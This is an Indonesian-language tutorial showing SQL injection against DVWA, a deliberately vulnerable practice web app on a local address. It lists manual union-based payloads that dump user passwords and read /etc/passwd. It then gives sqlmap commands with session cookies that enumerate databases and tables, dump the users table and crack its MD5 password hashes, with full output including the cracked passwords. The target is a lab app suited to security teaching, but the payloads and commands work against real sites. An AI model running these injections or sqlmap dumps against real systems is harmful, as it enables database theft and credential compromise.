SQLMap: Contoh SQL Injection ke DVWA
Sumber: http://www.null-reference.com/linux/sqlmap-with-dvwa-damn-vunerable-web-app/
Latar Belakang
Sebelum menggunakan SQLMAP akan sangat baik jika kita dapat melihat apakah injection dapat dilakukan. SQLMAP hanya alat bantu saja, sebaiknya kita mengetahui proses-nya secara manual. Semua SQLMAP fitur dapat dilakukan secara manual.
Proses manual untuk test Vulnerability
Cek apakah situs kita vulnerable
1′ or ’2′=’2
Kita perlu melihat berapa banyak kolom sebelum ada error.
‘ and 1=1 union select 1,2 # ‘ and 1=1 union select 1,2,3 #
Ini akan memperlihatkan bahwa tabel-nya hanya ada 2 kolom.
Mari kita melakukan injection.
‘ union SELECT 1, user() — ‘ ‘ and 1=1 union select database(),version() # ‘ union SELECT 1, user() # ‘ and 1=1 union select null,table_schema from information_schema.tables # ‘ and 1=1 union select table_name,table_schema from information_schema.tables # ‘ and 1=1 union select table_name,table_schema from information_schema.tables where table_schema=’dvwa’ # ‘ and 1=1 union select first_name,password from dvwa.users # ‘ union SELECT table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ # ‘ union SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘user_id’ # ‘ union select user, password FROM users # ‘ union SELECT 1, load_file(‘/etc/hosts’) # ‘ union SELECT 1, load_file(‘/etc/passwd’) #
Kita tahu bahwa 1,2,3 akan memberikan kita error kumpulan data hanya ada 2 kolom.
Menggunakan SQLMAP
Parameter yang kita gunakan & artinya
-u URL yang dituju --cookie mengirimkan / mengemulasi sebuah cookie header
Untuk memperoleh cookie, kita perlu mendapatkannya misalnya dengan firefox addon tamper data. Contoh
Cookie=security=low; PHPSESSID=ff1fig4sda49j0b2ah1e7j4eu7
--dbs Ini akan memberikan daftar database jika sukses dilakukan. -D Ini untuk menentukan database yang diserang. --tables untuk melihat daftar tabel dari database -D parm. --columns untuk melihat kolom di -tables parm --current-user untuk melihat current user yang menjalankan SQL --users untuk melihat semua users dari SQL --passwords untuk memberikan password yang di hash dari SQL instance.
Contoh Eksekusi
Cek daftar database yang ada
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" --dbs
hasilnya
[07:02:08] [INFO] fetching database names available databases [7]: [*] dvwa [*] information_schema [*] mediawiki [*] moodle [*] mysql [*] performance_schema [*] snort
Cek daftar tabel dari database dvwa
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa --tables
Hasilnya
[07:08:39] [INFO] fetching tables for database: 'dvwa' [07:08:39] [WARNING] reflective value(s) found and filtering out Database: dvwa [2 tables] +-----------+ | guestbook | | users | +-----------+
Cek format kolom tabel users
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --columns
Hasilnya
[07:11:51] [INFO] fetching columns for table 'users' in database 'dvwa' [07:11:51] [WARNING] reflective value(s) found and filtering out Database: dvwa Table: users [6 columns] +------------+-------------+ | Column | Type | +------------+-------------+ | user | varchar(15) | | avatar | varchar(70) | | first_name | varchar(15) | | last_name | varchar(15) | | password | varchar(32) | | user_id | int(6) | +------------+-------------+
dump password
sqlmap -u 'http://192.168.0.80/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie="security=low; PHPSESSID=0dim4l9ngdspqoq70gdihpcl41" -D dvwa -T users --dump
--dump akan meng-crack password yang di hash. Anda akan ditanya apakah akan menggunakan dictionary yang ada di SQLMAP atau dictionary kita sendiri.
Hasilnya
[07:15:16] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 [07:15:21] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] y [07:15:30] [INFO] starting dictionary-based cracking (md5_generic_passwd) [07:15:30] [INFO] starting 2 processes [07:15:35] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03' [07:15:42] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b' [07:15:50] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7' [07:15:54] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99' [07:16:00] [INFO] postprocessing table dump Database: dvwa Table: users [5 entries] +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+ | user_id | user | avatar | password | last_name | first_name | +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+ | 1 | admin | dvwa/hackable/users/admin.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | | 2 | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | | 3 | 1337 | dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | | 4 | pablo | dvwa/hackable/users/pablo.jpg | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | | 5 | smithy | dvwa/hackable/users/smithy.jpg | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | +---------+---------+---------------------------------+---------------------------------------------+-----------+------------+
Maka kita memperoleh password dari semua sql user :)